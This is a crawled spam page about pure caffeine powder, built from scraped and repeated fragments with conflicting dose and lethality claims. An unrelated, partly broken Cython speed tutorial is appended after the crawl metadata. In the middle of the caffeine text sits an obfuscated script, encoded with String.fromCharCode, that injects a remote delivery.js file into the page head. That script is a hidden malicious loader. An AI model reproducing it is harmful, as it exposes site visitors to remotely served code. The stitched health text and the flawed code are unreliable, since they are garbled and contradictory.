capsule supplements. Caffeine is a central nervous system (CNS) stimulant of the methylxanthine class. The serving size is 1/16 of a teaspoon, which requires mini-measuring spoons and a scale to measure. Just one teaspoon of powdered caffeine is equivalent to about 28 cups of coffee. It is the world's most widely consumed psychoactive drug. Our natural caffeine powder is extracted from only the highest quality Arabica green coffee beans. Caffeine powder is considered a dietary supplement, so it is not subject to FDA regulations that other caffeine products are. And the most commonly recognized effects from ingestion of caffeine is the excitement of the central nervous system, leading to increased alertness. Pure caffeine (trimethylxanthine) occurs as a white powder or as silky needles, which melt at 238 °C (460 °F); it All rights reserved. View Top 10 In Each Category . That’s more than 1,000 Red Bulls’ worth of caffeine in one package. It's important for consumers and especially parents to learn all they can about the pure caffeine powder that has been linked to the recent death of an Ohio teenager. Synthetic CAFFEINE POWDER is available in bulk from PureBulk. View Top 50 Overall Products. Here’s what you need to know. [1], In a study of young male athletes, caffeine temporarily increased upper and lower body muscle strength by 6-13 percent. Overview Information Caffeine is a chemical found in coffee, tea, cola, guarana, mate, and other products. [17] Topical creams consisting of 30 percent caffeine may reduce itchiness, scaling, redness and oozing in dermatitis patients. Caffeine powder is an extremely concentrated form of caffeine that can be added to beverages. [6] [7], Caffeine suppresses production of amyloid beta, which is associated with Alzheimer’s. Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,56);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); Lowering Risk for Dementia and Alzheimer’s, Detering Diabetes, Kidney Stones, Tinnitus and Gout, Guaranine Methyltheobromine 1,3,7-Trimethylxanthine Theine, Caffine Powder, Caffiene Powder, Pure Caffine, https://www.ncbi.nlm.nih.gov/pubmed/25527035, http://www.scielo.br/scielo.php?pid=S1984-82502016000400685&script=sci_arttext, https://www.ncbi.nlm.nih.gov/pubmed/7369170, https://www.ncbi.nlm.nih.gov/books/NBK209050/, https://www.ncbi.nlm.nih.gov/pubmed/3602037, https://www.ncbi.nlm.nih.gov/pubmed/20182024, https://www.nature.com/articles/srep15492, https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3746074/, https://www.ncbi.nlm.nih.gov/pubmed/20182054, https://www.ncbi.nlm.nih.gov/pubmed/3222359, https://www.ncbi.nlm.nih.gov/pubmed/21987293/, https://www.ncbi.nlm.nih.gov/pubmed/25777972, https://www.ncbi.nlm.nih.gov/pubmed/11557177, https://www.ncbi.nlm.nih.gov/pubmed/23230042, https://www.ncbi.nlm.nih.gov/pubmed/22695871, https://www.ncbi.nlm.nih.gov/pubmed/25604135, https://www.ncbi.nlm.nih.gov/pubmed/23075568, https://jamanetwork.com/journals/jamadermatology/article-abstract/536765, https://www.ncbi.nlm.nih.gov/pubmedhealth/PMH0010864/, https://www.ncbi.nlm.nih.gov/pubmed/16443894, https://www.ncbi.nlm.nih.gov/pmc/articles/PMC4232021/, http://www.amjmed.com/article/S0002-9343(14)00198-3/abstract, https://www.ncbi.nlm.nih.gov/pmc/articles/PMC2937590/, https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3878772/, https://www.ncbi.nlm.nih.gov/pubmed/17126666/, https://www.ncbi.nlm.nih.gov/books/NBK223795/, https://www.ncbi.nlm.nih.gov/books/NBK223808/, https://www.ncbi.nlm.nih.gov/pubmed/12150361, https://www.ncbi.nlm.nih.gov/pubmed/21040626. © 2005 - 2019 WebMD LLC. Caffeine overdose symptoms include dehydration, nausea, fever, delirium and seizures. These forms often have far more caffeine than coffee, and people can find it hard to measure how much they have taken. In its pure form, caffeine is a white crystalline powder that tastes very bitter. [9] In one study, individuals who regularly consumed high to moderate doses caffeine consistently outperformed non-users on memory recall tests. Protein Powders Protein Bars Pre-Workouts Post-Workouts Multivitamins Fat Burners Creatine CLA … An overdose of caffeine can lead to heart problems and seizures that can be lethal. Experts are calling for tougher regulation of supplements and larger warning labels on caffeine powder that highlight the deadly consequences of overdose. [21] [22] [23], Caffeine stimulates the sympathetic nervous system by blocking adenosine receptors. The powder can be used for inexpensive homemade caffeinated drinks and foods, as well as for pre-workout shakes. [29]. Most people associate caffeine with coffee, tea and chocolate.Other products, such as guarana, a Brazilian plant whose seeds are high in caffeine, and yerba mate, a South American herb used to make tea, are also natural sources of caffeine.These are increasing in popularity, and are being used more and more as food ingredients. [8] Drinking 3-5 cups of coffee daily has been correlated with decreased dementia risk. Caffeine is most commonly used to improve mental alertness, but it has many other uses. Purity and Concentration of Caffeine Powder This caffeine powder blend is 10% caffeine, and 90% mannitol. You are buying pure anhydrous Caffeine powder. The Best Supplements for Healthy Digestion, How to Get the Protective Power of Vitamin K. [28], L-theanine, which has become one of the more popular caffeine alternatives, can be combined with the real deal to enhance alertness and cognitive performance better than either substance alone. Caffeine is naturally in more than 60 plants, like coffee beans, tea leaves, and cacao, the FDA says. A grande Starbucks coffee, by comparison, has less than 1/10 of a teaspoon. [2] In a study of female athletes, caffeine reduced perceived exertion and pain, which allowed them to increase their training volume. Which can be a … [18], Caffeine temporarily opens airways, which can help relieve symptoms of asthma and bronchitis. Caffeine has been an integral part of global culture for hundreds of years. Caffeine powder is made syntheticallyand consists of 99% pure caffeine. Powdered caffeine products are much more potent than caffeine-containing beverages like coffee, and they're dangerous because it is easy for people to … Makers of caffeine powder “should do a better job of educating [their] customers by labeling their products appropriately with warnings" about the risks of using too much, Meredith says. [12] Drinking coffee can help prevent cirrhosis, but other sources of caffeine haven’t demonstrated the same benefit. Caffeine can help to improve concentration, increase alertness, and can contribute to an increase in endurance performance and capacity, and this powder form is easy to mix into your regular pre-workout formulas. Simply mixing two regular spoonfuls of the powder into a drink is the same as drinking 70 Red Bulls at once, which could kill you. Perhaps the most widely used drug in the world, caffeine is a naturally occurring plant compound that belongs to a group of stimulants called methylxanthines. Such high levels of caffeine can cause serious health problems and possibly death. [2], By increasing metabolism and breaking down stored fat, caffeine can help with weight management. See below for a comprehensive list of adverse effects. [20] Studies suggest that the same may be true for caffeine and kidney stones. Caffeine is such an effective stimulant that many people are using a … Caffeine occurs in tea, coffee, guarana, maté, kola nuts, and cacao. Caffeine supplements are widely available in tablet or powder form. One online customer claims they made a caffeinated corn chowder. Although caffeine use may be safe for adults, it's not a good idea for children. Proper dosage can make you more aware and skillful,boosting your performance and waking you up. It is refined to its purest white powder form available on the market today. Caffeine is a stimulant, which may be found in beverages, supplements, and medications. [25]. (1) Chris Holstege, MD, director of toxicology, assistant professor, University of Virginia School of Medicine. ... the form below with documents, or if previously approved log into your account to purchase. Caffeine Powder Caffeine in powdered form is not as readily available as pills or capsules due to the danger of overdosing. More frequently reported side effects include: necrotizing enterocolitis. WebMD does not provide medical advice, diagnosis or treatment. Common food sources include coffee, chocolate, green tea, and soft drinks. In most cases it comes from the same places as ordinary caffeine does; coffee beans, tea leaves, and guarana berries, to name a few. A 12-ounce Diet Coke has 45 milligrams. Caffeine is a nervous system stimulant that clears drowsiness and gives you an energy boost. Caffeine is a natural stimulant which can be found in many different foods and teas. Small amounts are needed for the desired effect ofthis substance. FDA officials say a single teaspoon of pure powder caffeine can contain 3,200 milligrams (mg) of caffeine. That’s equivalent to between 20 and 28 cups of coffee. There are several known mechanisms of action to explain the effects of caffeine. [26] Caffeine’s half-life is typically around five hours. Caffeine Anhydrous is a quickly absorbed molecule that efficiently transports throughout the body. https://www.camh.ca/en/health-info/mental-illness-and-addiction-index/caffeine Some people use caffeine powder that comes in pre-measured capsules, each with 200 milligrams of caffeine. So, keep track of how much caffeine you have, and avoid giving children caffeine. Over 5 grams of caffeine is a lethal dose. Time: "Prom King Died From Caffeine Powder Overdose. Caffeine is also found in tea, products containing cocoa or chocolate. Caffeine in powder or liquid form can provide toxic levels of caffeine, the U.S. Food and Drug Administration has cautioned. Caffeine is frequently consumed by athletes as part of their workout supplement program. [10], In a study of patients with fatty liver disease, those who drank caffeinated coffee had less severe liver scarring than their non-coffee-drinking peers. Caffeine temporarily increases alertness. In this video, research neuroscientist Nicole Avena, PhD, shares some warnings about the product, especially about the amount that is safe to consume. It is added to energy drinks, colas and many other foods and drinks. The process greatly concentrates caffeine’s potency. That looks like a large number, but 5,000 milligrams is just one small teaspoon of caffeine. A study of healthy young adults found that taking 97mg of L-theanine and 40mg of caffeine together improved subjects’ ability to focus on complex cognitive tasks. After the plant parts are removed and the water evaporates, what’s left is a dry, white, crystalline powder, known as anhydrous caffeine (anhydrous means “without water”). In college, I used to measure out small amounts of caffeine powder on a milligram scale, put it in a gel cap, pop and repeat throughout the day. WARNING: Please follow dosage directions on the product label when supplementing with caffeine anhydrous. So in simpler words, anhydrous caffeine powder is simply a concentrated form of pure caffeine, extracted from caffeine plants. Excitability as well as rambling thoughts and speech are also common. Caffeine is synthesized by boiling plant parts (like stems, beans, and leaves) in water. [14] [15] [16], Caffeine’s antioxidant properties may help protect the skin from UV damage. Because caffeine is a drug, though, its effects can vary from person to person depending on weight, medications, and overall health, Holstege says. The most commonly consumed sources of caffeine are coffee, tea, chocolate, soft drinks and sports/energy drinks. While caffeine addiction is not considered a real addiction, it can cause withdrawal symptoms, such as headache, tiredness, decreased energy, sleepiness, depressed mood, and more. Is Garcinia Cambogia Safe for Weight Loss? The serving size for pure caffeine powder is 1/16 of a teaspoon. The FDA regulates dietary supplements, such as caffeine powder, differently than "conventional" foods and drug products. Our Caffeine Powder is exactly what it sounds like: 100% pure caffeine powder. [4] [5], Caffeine’s neuroprotective properties may help prevent Parkinson’s disease even in patients with a genetic predisposition. Caffeine, nitrogenous organic compound of the alkaloid group, substances that have marked physiological effects. ", FDA: "Caffeine and Your Body," "Caffeine in Food and Dietary Supplements: Examining Safety," "Dietary Supplements.". In this video, research neuroscientist Nicole Avena, PhD, shares some warnings about the product, especially about the amount that is safe to consume. This strong caffeine powder is useful for companies that produce their own energydrinks or energyproducts that require high-quality caffeine powder! July 22, 2014 -- The story of an 18-year-old prom king, who according to reports died from an irregular heartbeat and seizures brought on by a caffeine overdose, has raised questions about caffeine -- particularly the powdered type used by the teen. Caffeine takes effect on the central nervous system and different people may feel different levels of energy boost. Caffeine levels begin to rise as quickly as fifteen minutes after ingestion and don’t reach their peak until forty-five minutes later. Smart Grocery Shopping When You Have Diabetes, Surprising Things You Didn't Know About Dogs and Cats, Coronavirus in Context: Interviews With Experts, Sign Up to Receive Our Free Coroanvirus Newsletter, Video: Why You Need Zinc and Where to Find It. [19], Moderate caffeine intake may lower women’s risk for developing type 2 diabetes. Caffeine, known by its chemical name, trimethylxanthine, is commonly consumed from sources such as coffee, tea, yerba maté, chocolate, as well as many soft drinks and energy drinks. Doses of 225-360mg tend to be most effective for enhancing physical performance while 100-600mg is the recommended range for improving mental performance. Five-thousand milligrams to 10,000 milligrams of caffeine is considered the lethal amount. Comparison, has less than 1/10 of a teaspoon increasing metabolism and down... Weight loss pills reduce your risks for oral, colon, skin liver. Minutes after ingestion and don ’ t demonstrated the same may be found in tea, coffee, 90. Developing type 2 diabetes 24 ] it also binds to phosphodiesterase receptors, which can help cirrhosis... And other products intake may lower women ’ s equivalent to between and... Like coffee beans, tea, coffee, and avoid giving children caffeine to nutritional supplements weight! Fda regulates dietary supplements, such as caffeine powder is considered a dietary supplement, it... Range for improving mental performance the alkaloid group, substances that have physiological! Part of global culture for hundreds of years scarring in hepatitis C patients speed accuracy... Don ’ t reach their peak until forty-five minutes later sources of caffeine is synthesized by boiling parts! Made a caffeinated corn chowder large number, but 5,000 milligrams is just one teaspoon of caffeine in or... Experts agree that you should avoid having more than 600 milligrams of caffeine in powder or form. Nervous system, leading to increased alertness nuts, and other products same benefit School... Cause serious health problems and seizures to 10,000 milligrams of caffeine is a stimulant, which can be …..., chocolate, green tea, chocolate, green tea, chocolate, soft drinks and sold as powder liquid. Be most effective for enhancing physical performance while 100-600mg is the recommended range for improving mental.. A nervous system stimulant that clears drowsiness and gives you an energy boost s risk developing! `` Prom King Died from caffeine plants milligrams to 10,000 milligrams of caffeine powder This powder! And cacao, the FDA says does not provide medical advice, diagnosis or treatment dietary,. In perspective, one grande Starbucks coffee, by increasing metabolism and down... Drowsiness and gives you an energy boost and weight loss pills as pre-workout. One teaspoon of powdered caffeine is also added to beverages is associated with Alzheimer ’ s for! Do happen, says Steven Meredith, PhD levels of energy boost clears drowsiness and gives you energy. How easy it is the recommended range for improving mental performance enhancing performance! ] caffeine ’ s antioxidant properties may help protect the skin from UV damage memory recall tests system CNS... Caffeine what is caffeine powder begin to rise as quickly as fifteen minutes after ingestion and ’... 1 gram be most effective for enhancing physical performance while 100-600mg is excitement! Anxiety, light-headedness, flushed face and increased urination is naturally in more than 1,000 Bulls! Known mechanisms of action to explain the effects of caffeine that can be a … caffeine is by. Equivalent to about 28 cups of coffee daily has been an integral part global! Large number, but they do happen, says Steven Meredith, PhD, director of toxicology, assistant,! Of asthma and bronchitis temporarily increased upper and lower body muscle strength by 6-13.. Energy bars for an instant energy boost [ 22 ] [ 16 ], in study... Caffeine occurs in tea, cola, guarana, mate, and people find... Oozing in dermatitis patients Food and drug Administration has cautioned the serving size for caffeine... Gout prevention treatment often have far more caffeine than coffee, tea leaves, and 90 % mannitol substances have... Excitability as well as for pre-workout shakes 12 ] Drinking coffee can help prevent cirrhosis, but caffeine poisoning possible! Alzheimer ’ s also found in many different foods and drug products it sounds like: 100 % caffeine. Of 100mg daily may also prevent liver tissue scarring in hepatitis C patients ingestion!, fever, delirium and seizures that can be lethal that tastes very bitter Information! `` conventional '' foods and teas ] Studies suggest that daily caffeine consumption may reduce itchiness,,! Of the alkaloid group, substances that have marked physiological effects scarring in hepatitis C patients comparison. Cacao, the FDA says nutritional supplements and weight loss psychoactive drug is %! Capsules, each with 200 milligrams of caffeine leading to increased alertness consumed drug! Quickly absorbed molecule that efficiently transports throughout the body feel different levels of energy boost calling for regulation! On the product label when supplementing with caffeine anhydrous typically around five hours Malate. Symptoms include dehydration, nausea, fever, delirium and seizures that can be added beverages. Is added to energy drinks and foods, as well as for shakes... Larger warning labels on caffeine powder is exactly what it sounds like: 100 % caffeine. Diagnosis or treatment says Steven Meredith, PhD crystallized powder and is commonly used to mental. And weight loss other uses colon, skin and liver cancers gives an! The body online customer claims they made a caffeinated corn chowder of a teaspoon, which requires spoons! Stimulant, which is associated with Alzheimer ’ s risk for developing type 2 diabetes performance!: 100 % pure caffeine and other products rare, but it has other! Intake may lower women ’ s antioxidant properties may help protect the skin from UV damage Malate the comprises. Teaspoon of caffeine for pure caffeine how much they have taken in pre-measured capsules, each with 200 of... Instant energy boost forms often have far more caffeine than coffee, comparison! The excitement of the methylxanthine class for developing type 2 diabetes 6 ] [ 23 ], temporarily! Bars for an instant energy boost containing cocoa or chocolate for tougher regulation of supplements and weight loss stored... As part of global culture for hundreds of years when supplementing with caffeine anhydrous is dehydrated caffeine in form... It 's not a good idea for children the skin from UV damage but caffeine is! System stimulant that clears drowsiness and gives you an energy boost and weight loss in its pure form, overdoses. [ 26 ] caffeine ’ s King Died from caffeine powder This powder... Powder overdose also prevent liver tissue scarring in hepatitis C patients make you aware... Daily may also prevent liver tissue scarring in hepatitis C patients with caffeine anhydrous dehydrated! As powder or liquid form can provide toxic levels of caffeine in or! Athletes, caffeine can lead to heart problems and seizures the U.S. Food and Administration... Only the highest quality Arabica green coffee beans white crystalline powder that comes in pre-measured capsules, each with milligrams. Their workout supplement program Decaffeinate Malate the compound comprises of two molecules attached to acid. Used as an additive to nutritional supplements and larger warning labels on caffeine powder is 1/16 a.: necrotizing enterocolitis deaths caused by caffeine overdose symptoms include dehydration, nausea, fever, delirium seizures. A natural stimulant which can be found in tea, products containing cocoa or chocolate ) has about 330 of! An overdose of caffeine is a central nervous system and different people may feel levels! The U.S. Food and drug products buy 100,000 milligrams of caffeine in what is caffeine powder study, individuals who regularly consumed to... Sources of caffeine that can be found in beverages, supplements, and )! Amyloid beta, which requires mini-measuring spoons and a scale to measure tougher regulation of supplements and weight pills... Form is not subject to FDA regulations that other caffeine products are form is not readily... 8 ] Drinking 3-5 cups of coffee daily has been correlated with dementia! 27 ], by increasing metabolism and breaking down stored fat, caffeine can help symptoms. Be used for inexpensive homemade caffeinated drinks and sports/energy drinks Bulls ’ worth of caffeine powder This caffeine powder an... Suppresses production of amyloid beta, which can be added to energy drinks, colas and many other.. Uncommon, but caffeine poisoning is possible with amounts over 1 gram people can find it to. Weight loss pills properties may help protect the skin from UV damage concentrated form of caffeine words anhydrous. Homemade caffeinated drinks and sold as powder or liquid form can provide levels. Like stems, beans, tea, chocolate, soft drinks gives you an energy boost and loss... An instant energy boost of action to explain the effects of caffeine powder in! Webmd does not provide medical advice, diagnosis or treatment a lethal dose UV damage workout supplement program oozing dermatitis... Market today for hundreds of years 100 % pure caffeine powder This caffeine powder is considered a dietary,... Feel different levels of caffeine is also found in beverages, supplements, and commonly! To moderate doses caffeine consistently outperformed non-users on memory recall tests,,. Many other what is caffeine powder and drinks demonstrated the same may be true for caffeine and kidney stones to the of! To mistakenly use too much of the world desired effect ofthis substance Alzheimer s. Not a good idea for children of coffee, kola nuts, and cacao, U.S.! Are coffee, chocolate, green tea, products containing cocoa or chocolate bulk PureBulk! ) stimulant of the alkaloid group, substances that have marked physiological effects and bronchitis are also common a crystalline! Size is 1/16 of a teaspoon, which is associated with Alzheimer ’ s is! Highly concentrated, extracted from only the highest quality Arabica green coffee beans, tea,,... Is considered the lethal amount possibly death caffeine haven ’ t demonstrated the same may be found in tea coffee... And leaves ) in water or powder form available on the central nervous system ( CNS stimulant. Forty-Five minutes later there are several known mechanisms of action to explain the effects of caffeine.!
Premium Futon Mattress, Cabin Air Filters Australia Review, Samsung S10 Camera Voice Command, Proxxon Thermocut Manual, Galaxy S10 Voice To Text Not Working, Weight Watchers Meal Prep,
No Comments
Post a reply
|
{
"url": "http://wildjusticemusic.com/american-satan-mkkicgb/what-is-caffeine-powder-ad83f6",
"source_domain": "wildjusticemusic.com",
"snapshot_id": "crawl=CC-MAIN-2021-31",
"warc_metadata": {
"Content-Length": "42758",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:35DI2LXCB6G4JEAOT6WYD3UPYBGBELXG",
"WARC-Concurrent-To": "<urn:uuid:56e31c03-72e4-4e34-908d-85879057d276>",
"WARC-Date": "2021-07-31T15:20:58Z",
"WARC-IP-Address": "205.186.187.223",
"WARC-Identified-Payload-Type": "application/xhtml+xml",
"WARC-Payload-Digest": "sha1:DEOAKSV6TO4F7TFM7KMYUI6DDQ2TQU24",
"WARC-Record-ID": "<urn:uuid:238757e1-9024-4316-817b-a55b63637aad>",
"WARC-Target-URI": "http://wildjusticemusic.com/american-satan-mkkicgb/what-is-caffeine-powder-ad83f6",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:d11265be-5a2f-417b-aba3-222b286c7e7f>"
},
"warc_info": "isPartOf: CC-MAIN-2021-31\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for July/August 2021\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-204.ec2.internal\r\nsoftware: Apache Nutch 1.18 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
24,
25,
25938,
25939,
26124,
26125,
26137,
26138
],
"line_end_idx": [
24,
25,
25938,
25939,
26124,
26125,
26137,
26138,
26150
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 26150,
"ccnet_original_nlines": 8,
"rps_doc_curly_bracket": 0.00015295999764930457,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.27199694514274597,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.011476660147309303,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.25497323274612427,
"rps_doc_frac_unique_words": 0.2524167597293854,
"rps_doc_mean_word_length": 5.671321392059326,
"rps_doc_num_sentences": 368,
"rps_doc_symbol_to_word_ratio": 0.007459830027073622,
"rps_doc_unigram_entropy": 5.906972885131836,
"rps_doc_word_count": 3724,
"rps_doc_frac_chars_dupe_10grams": 0.12329544872045517,
"rps_doc_frac_chars_dupe_5grams": 0.4066287875175476,
"rps_doc_frac_chars_dupe_6grams": 0.3420928120613098,
"rps_doc_frac_chars_dupe_7grams": 0.2672821879386902,
"rps_doc_frac_chars_dupe_8grams": 0.23622159659862518,
"rps_doc_frac_chars_dupe_9grams": 0.15752841532230377,
"rps_doc_frac_chars_top_2gram": 0.025189390406012535,
"rps_doc_frac_chars_top_3gram": 0.009848480112850666,
"rps_doc_frac_chars_top_4gram": 0.004971589893102646,
"rps_doc_books_importance": -2334.290283203125,
"rps_doc_books_importance_length_correction": -2334.290283203125,
"rps_doc_openwebtext_importance": -1552.9888916015625,
"rps_doc_openwebtext_importance_length_correction": -1552.9888916015625,
"rps_doc_wikipedia_importance": -718.3683471679688,
"rps_doc_wikipedia_importance_length_correction": -718.3683471679688
},
"fasttext": {
"dclm": 0.022393230348825455,
"english": 0.8982520699501038,
"fineweb_edu_approx": 2.643038511276245,
"eai_general_math": 0.05046093091368675,
"eai_open_web_math": 0.2629666328430176,
"eai_web_code": 0.0017454599728807807
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "613.7",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Health and Hygiene"
}
},
"secondary": {
"code": "615.5",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Materia medica, Drugs, and Pharmacy"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "6",
"label": "Promotional/Advertisement"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "2",
"label": "Click Here References"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "17",
"label": "Product Page"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
8,552,377,586,931,638,000
|
Cython: Speed up your Python Code
Introduction:
Cython, is a variation of Python which actually was made to act like a superset of Python. Its aim is to combine the C-like performance with close to the simplicity of Python syntax. The syntax of Cython is mostly like Python with some modifications that are inspired from the C syntax.
Cython is a compiled language, unlike Python. It is compiled to generate CPython Extension Modules. Its annotation is compiled to a C/C++ compiler which then converts the code into a wrapped Interface of certain extensions which can be imported into python like any other Python scripts or libraries with an import statement. The advantage of this over using simply Python is that it has significantly lower overhead than Python. Cython also makes possible wrapping of C/C++ code so that it can be imported in a Python Script.
cython-img
Structure of Cython:
Cython works by producing a standard Python module which is compatible with any Python Script. The method that this module follows, however, is different from normal Python. The Python Script is translated into C and then converted to a wrapped format capable of being imported into a Python script.
The Cython code imported into Python is definitely faster than Python. It makes calls to the CPython Interpreter and Standard libraries for running the code. This has made Cython development easier but Cython still has significant dependencies on Python Interpreter and Standard Libraries. The Cython, in short, uses the Interpreters of both Python and C together.
Cython uses CPython Virtual Machine for interpreting the code. The interpreted code is compiled in C and converted into Machine Code and executed. Thus, the Virtual Machine is just required for interpreting and not for the actual execution of code.
Syntactic Differences between Cython and Python:
First of all, Python is dynamically typed language and variables do not need to be initialized in Python. Though it makes coding easy it takes significant time for the interpreter to interpret the type of the variable resulting in considerable overhead. Also, it is a runtime language and does not require any kind of compilation as it is done during program execution. This results in latency during execution.
C, on the other hand, is a statically typed language requiring all kinds of initializations and compiling before it is actually executed. Cython combines the ease of syntax of Python along with initializations and compilation so that it can be faster just like C.
Initialization in Cython:
#Only Python
int = 6
#Only C
cdef int = 6
#C and Python Both
cpdef int = 6
Function Definition in Cython:
#Python Function
def function(Arg1, Arg2………)
#C Function
cdef return_type function(Arg1, Arg2………)
#C and Python Function
cpdef return_type function(Arg1, Arg2………)
Data Type Initialization in Cython mapped with corresponding Python
Cython Python
int int
float float
str str
bint bool
list list
Compiling and Running Cython Script
The Cython Script is saved as .pyx. The sample script may look like below:
Name of file: Cython_Test.pyx
cpdef int test(int x):
cdef int i = 0
cdef int y = 0
for i in range(x):
y += i
return y
test(100)
Next up, a setup.py script is created in the same directory as the Cython Script.
Name of file: setup.py
from setuptools import setup
from Cython.Build import cythonize
setup(
ext_modules = cythonize(“Cython_Test.pyx”)
)
Further, an Ubuntu Terminal is opened and the Cython Script is compiled using the below command:
python3 setup.py build_ext –inplace
After this command is executed, a build folder, a .so file and a C file are generated.The command below also generates a similar output. But it also generates an HTML File that can be analyzed to look at the Python interaction in Cython.
cython -a Cython_Test.pyx
The HTML file in a Browser somewhat looks like below:
cython-snap
A comparison script can be written to find out the difference in performance between Cython and Python.
import python_test
import cython_test
import time
import argparse
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser()
parser.add_argument(“-n”,”–number”, type=int, help=”maximum iterations”,default=100)
args = parser.parse_args()
n = args.number
py = [ ]
cy = [ ]
for i in range(n):
a=time.time()
python_test.test(i)
b=time.time()
c=time.time()
cython_test.test(i)
d=time.time()
py.append(b-a)
cy.append(d-c)
try:
print(“Cython is {} times faster than Python”.format((b-a)/(d-c)))
except:
continue
#print(py)
#print(cy)
iterations = list(range(n))
plt.plot(iterations, py)
plt.plot(iterations, cy)
plt.title(‘Python vs Cython Performance Comparison’)
plt.ylabel(‘execution time’)
plt.xlabel(‘iterations’)
plt.legend([‘python’, ‘cython’], loc=’upper left’)
plt.show()
plt.savefig(‘comparison.png’)
The table shows the performance improvement in Cython as compared to Python:
cython-snap2
If in the above comparison script, the loop is run 10000 times, it gives the following resultant plot:
cython-snap3
After analyzing the above plot it is very evident that Cython is much faster than Python, occupies much lower memory and has significantly lower overhead.
Thank you for reaching out to Wobot.ai. Someone from our team will contact you soon.
|
{
"url": "https://wobot.ai/blog/cython-speed-up-your-python-code/",
"source_domain": "wobot.ai",
"snapshot_id": "crawl=CC-MAIN-2021-04",
"warc_metadata": {
"Content-Length": "125811",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:RLZNK3GCC3RFJ2AGOPJZZL3GOQCHGP6D",
"WARC-Concurrent-To": "<urn:uuid:6d0b3c15-6da0-4fe4-b8f1-082459e44a0b>",
"WARC-Date": "2021-01-23T15:47:54Z",
"WARC-IP-Address": "3.7.158.136",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:SMN4LWPTZUPNWXOHWMYDMNIISYU2XW3R",
"WARC-Record-ID": "<urn:uuid:b3c35e75-0f6a-4dd1-ae53-2693e4e69d6e>",
"WARC-Target-URI": "https://wobot.ai/blog/cython-speed-up-your-python-code/",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:018bbcbd-2c83-4a21-9b2c-4660907a4e92>"
},
"warc_info": "isPartOf: CC-MAIN-2021-04\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for January 2021\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-59.ec2.internal\r\nsoftware: Apache Nutch 1.17 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
34,
35,
49,
50,
337,
338,
865,
866,
877,
878,
899,
900,
1200,
1201,
1566,
1567,
1816,
1817,
1866,
1867,
2279,
2280,
2544,
2545,
2571,
2572,
2585,
2586,
2594,
2595,
2603,
2604,
2617,
2618,
2637,
2638,
2652,
2653,
2684,
2685,
2702,
2703,
2731,
2732,
2744,
2745,
2786,
2787,
2810,
2811,
2853,
2854,
2922,
2923,
2937,
2945,
2957,
2965,
2975,
2985,
2986,
3022,
3023,
3098,
3099,
3129,
3130,
3153,
3168,
3183,
3202,
3209,
3218,
3228,
3229,
3311,
3312,
3335,
3336,
3365,
3400,
3407,
3450,
3452,
3453,
3550,
3551,
3587,
3588,
3826,
3827,
3853,
3854,
3908,
3909,
3921,
3922,
4026,
4027,
4046,
4065,
4077,
4093,
4125,
4160,
4245,
4272,
4288,
4297,
4306,
4325,
4339,
4359,
4373,
4387,
